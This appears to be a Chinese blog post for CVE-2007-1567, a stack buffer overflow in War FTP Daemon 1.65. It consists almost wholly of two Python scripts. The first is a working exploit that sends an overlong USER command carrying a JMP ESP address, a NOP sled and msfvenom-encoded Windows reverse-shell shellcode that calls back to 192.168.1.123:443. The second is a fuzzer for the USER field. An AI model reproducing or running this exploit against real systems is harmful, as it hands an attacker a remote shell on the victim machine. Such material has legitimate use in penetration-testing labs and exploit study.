# CVE-2007-1567 War FTP Daemon 1.65堆棧緩衝區溢出漏洞
==warftp-ftp.py==
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 774699BF FFE4 JMP ESP # bad characters \x00\x0a\x0d # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows shellcode = ("\xd9\xed\xba\xda\x93\x0e\xa1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1" "\x52\x31\x55\x17\x83\xc5\x04\x03\x8f\x80\xec\x54\xd3\x4f\x72" "\x96\x2b\x90\x13\x1e\xce\xa1\x13\x44\x9b\x92\xa3\x0e\xc9\x1e" "\x4f\x42\xf9\x95\x3d\x4b\x0e\x1d\x8b\xad\x21\x9e\xa0\x8e\x20" "\x1c\xbb\xc2\x82\x1d\x74\x17\xc3\x5a\x69\xda\x91\x33\xe5\x49" "\x05\x37\xb3\x51\xae\x0b\x55\xd2\x53\xdb\x54\xf3\xc2\x57\x0f" "\xd3\xe5\xb4\x3b\x5a\xfd\xd9\x06\x14\x76\x29\xfc\xa7\x5e\x63" "\xfd\x04\x9f\x4b\x0c\x54\xd8\x6c\xef\x23\x10\x8f\x92\x33\xe7" "\xed\x48\xb1\xf3\x56\x1a\x61\xdf\x67\xcf\xf4\x94\x64\xa4\x73" "\xf2\x68\x3b\x57\x89\x95\xb0\x56\x5d\x1c\x82\x7c\x79\x44\x50" "\x1c\xd8\x20\x37\x21\x3a\x8b\xe8\x87\x31\x26\xfc\xb5\x18\x2f" "\x31\xf4\xa2\xaf\x5d\x8f\xd1\x9d\xc2\x3b\x7d\xae\x8b\xe5\x7a" "\xd1\xa1\x52\x14\x2c\x4a\xa3\x3d\xeb\x1e\xf3\x55\xda\x1e\x98" "\xa5\xe3\xca\x0f\xf5\x4b\xa5\xef\xa5\x2b\x15\x98\xaf\xa3\x4a" "\xb8\xd0\x69\xe3\x53\x2b\xfa\xcc\x0c\x32\x81\xa4\x4e\x34\x74" "\x8e\xc6\xd2\x1c\xe0\x8e\x4d\x89\x99\x8a\x05\x28\x65\x01\x60" "\x6a\xed\xa6\x95\x25\x06\xc2\x85\xd2\xe6\x99\xf7\x75\xf8\x37" "\x9f\x1a\x6b\xdc\x5f\x54\x90\x4b\x08\x31\x66\x82\xdc\xaf\xd1" "\x3c\xc2\x2d\x87\x07\x46\xea\x74\x89\x47\x7f\xc0\xad\x57\xb9" "\xc9\xe9\x03\x15\x9c\xa7\xfd\xd3\x76\x06\x57\x8a\x25\xc0\x3f" "\x4b\x06\xd3\x39\x54\x43\xa5\xa5\xe5\x3a\xf0\xda\xca\xaa\xf4" "\xa3\x36\x4b\xfa\x7e\xf3\x6b\x19\xaa\x0e\x04\x84\x3f\xb3\x49" "\x37\xea\xf0\x77\xb4\x1e\x89\x83\xa4\x6b\x8c\xc8\x62\x80\xfc" "\x41\x07\xa6\x53\x61\x02") buffer = "A" * 485 + "\xbf\x99\x46\x77" + "\x90" * 20 + shellcode + "C" * (5500-485-4) try: print "\nSending evil buffer..." s.connect(("192.168.1.131", 21)) s.recv(1024) s.send('USER ' + buffer + '\r\n') data=s.recv(1024) print "\nDone!." except: print "Could not connect to FTP!"
==ftp-user-fuzz.py==
#!/usr/bin/python import socket buffer = ["A"] counter=100 while len(buffer) < 30: buffer.append("A"*counter) counter=counter+200 for string in buffer: print "Fuzzing USER with %s bytes" % len(string) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(("192.168.1.131", 21)) s.recv(1024) s.send('USER ' + string + '\r\n') s.recv(1024) s.send('QUIT\r\n') s.close()
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容